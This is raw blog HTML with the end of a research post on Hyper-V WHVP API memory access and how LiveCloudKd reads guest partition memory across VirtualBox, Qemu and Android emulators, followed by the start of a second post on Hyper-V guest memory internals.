<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fd000 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fd010 r8=0000000000080400 r9=0000000000000ff0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fd000 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fd010 r8=0000000000080400 r9=0000000000000ff0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can see to VPN and GPN trees data:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="205" src="https://lh4.googleusercontent.com/JG_llaqMvrrCqckwdsfeW8xx-KOJqzgVjYA_8csXnlNlnU7OCXOs9P__ZPsAK1fJ5__Xrwc4jtNM6ExxlyNsvLuibS2VlLkxstQ8m329aOpOOIuH0OE564TRazp2aJ5A3ogUJhvSVRJf8jrc0A" style="margin-left: 0px; margin-top: 0px;" width="499" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="218" src="https://lh6.googleusercontent.com/blHGkcBkRHKT54xDwd4OPBvUCj9sgPedYkrFEizcoENos4drGeFjdDpz8m0kbgu4r-BEhc2Ag1o2GXGZorV5fCQeypbshwlAm9HLtIYJIOE0Uqwkqbm8_TvZsWz3GrNxBvHHOFqfIqdUQ2j2xw" style="margin-left: 0px; margin-top: 0px;" width="506" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="200" src="https://lh5.googleusercontent.com/QuwP9yXdhs3UJPPH1qFqg6BLu4Zhw9mxlIAqMUCVNQXvBSIZhAHS49ybVeKgX-865BZlxZQDzkeKaYc4LFgewmcprg8Cbz7d7EYMfR_XlEJRyeZms_ryZPHjvuFmm34DBFW5bgtBNEN2mzzGpA" style="margin-left: 0px; margin-top: 0px;" width="510" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The size of the blocks in guest OS is approximately the same (bfedd and bff40), but technically it not equivalent.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For VirtualBox 6.1.8 we get:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="199" src="https://lh3.googleusercontent.com/cvoJOXpNsRxENKrwggKB4Md6rETiFwZfFQKRV2HWjHh87WS80P9zz7u3kpjL3HYQ2rOMpdM2AuvGSn0Q_JHXnagN_v7kW8IjIXax0jATbivTJT56lFajS7WNOtZcvERc8TMXgaIx9-V2xXFRig" style="margin-left: 0px; margin-top: 0px;" width="231" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Despite that VirtualBox developers use winhvplatform!WHvCreatePartition, they do not perform memory mapping using winhvplatform!WHvMapGpaRange and winhvr!WinHvMapGpaPagesSpecial. VirtualBox emulation operations is partitially performed in kernel mode, and usermode performance is insufficient for the virtualization subsystem to function normally. The development topic about compatibility of Hyper-V and VirtualBox can be seen on the official VirtualBox forum:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://forums.virtualbox.org/viewtopic.php?f=6&t=90853" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://forums.virtualbox.org/viewtopic.php?f=6&t=90853</span></a></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The main subsystem working with Hyper-V is described in this file:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://www.virtualbox.org/browser/vbox/trunk/src/VBox/VMM/VMMR3/NEMR3Native-win.cpp" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://www.virtualbox.org/browser/vbox/trunk/src/VBox/VMM/VMMR3/NEMR3Native-win.cpp</span></a></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WHVP API usage example can be seen in: </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://github.com/ionescu007/Simpleator" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/ionescu007/Simpleator</span></a><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- Simpleator application: </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://github.com/epakskape/whpexp" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/epakskape/whpexp</span></a><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- NOP generator from Microsoft (https://en.wikipedia.org/wiki/NOP_slide);</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://crates.io/crates/libwhp" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://crates.io/crates/libwhp</span></a><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;"> - </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WHVP Rust-based API;</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://github.com/0vercl0k/pywinhv" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/0vercl0k/pywinhv</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - WHVP python-based API.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After adding that algorithm to LiveCloudKd, it became possible to read the memory of all partitions created using the WHVP API. Writing operation has same algorithm with 1 difference - need change direction.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="213" src="https://lh3.googleusercontent.com/b5okXcjWtO_BZ58O5NFPfKjBkYREaq3HPioZOH3YdH0A0Ilh4kimf0lyBEAXLwTDJzelJozeEa-ko-7_4QHLiZCeldFbJHgCCBtKFFngM_dkQdEypJj-EzWTSPLQ0enfyQxpRH4637UpMI2Svg" style="margin-left: 0px; margin-top: 0px;" width="498" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Memory organization for Windows 10 1803 is similar with Windows Defender Application Guard\Windows Sandbox containers or Docker Containers running in Hyper-V isolation mode.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="407" src="https://lh6.googleusercontent.com/NiC9qPtsRtcJuNco8eBYs7wIQ_pWiKuGGbWcyfTPbjD4ykX-ySMtz87H9bUK4FEIUK1gunCDCuMMYs_4JVglHJjOv6F7ERZSMFEYH9FXBt5WQprGrvee5KztC8vtvNpQTF4DD7IQcX3k2oxrpA" style="margin-left: 0px; margin-top: 0px;" width="489" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Google Android emulator (Qemu-based):</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="369" src="https://lh6.googleusercontent.com/CBbp41b27_lv9g1HCIYHG5gyGJ3_fGAy-4cEX-P-I1g6mwzXSpDvWFm142KxeNWbuyBJEr_OJl7Z9fNhSZ23naRUwzAeX2BQZg8IL7IRUHS5Niw9acwyx4R9eyp1J1Viw_QYBup9SS1M0HezaQ" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<div style="text-align: left;">
<div style="text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Conclusion</span></div>
</div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In general, we can say, that some emulators successfully work with WHVP API (Qemu, Android), and some haven’t been able to switch to them fully (Virtual Box, VMware). Microsoft clearly doesn’t want to simplify the life of competitive products, although there is no direct benefit to Microsoft in this. The performance of virtual operating systems running these APIs also raises questions. And I think, that documented API for kernel mode winhvr.sys can solved this problem.</span></div>
</div>
<div style="text-align: left;">
<br /></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-5242916554865778412019-09-10T14:52:00.001-07:002019-10-31T08:46:47.149-07:00Hyper-V memory internals. Guest OS memory access<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-weight: 700; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-weight: 700; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-weight: 700; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-weight: 700; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-weight: 700; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Software, used in article (operation systems have August 2019 patches):</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10, build 1903 x64</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2019</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2016</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG Preview</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Visual Studio 2019</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Process Hacker</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PyKd plugin for WinDBG</span></div>
</div>
<b id="docs-internal-guid-46578f62-7fff-9791-60ae-82cb6985f3ad" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Testing lab works on Intel-based PC. Therefore, Intel specific Hyper-V terms: hvix64.exe, vmcall instruction, etc will be used in article context.</span></div>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Terms and definitions:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0; margin-top: 0;">
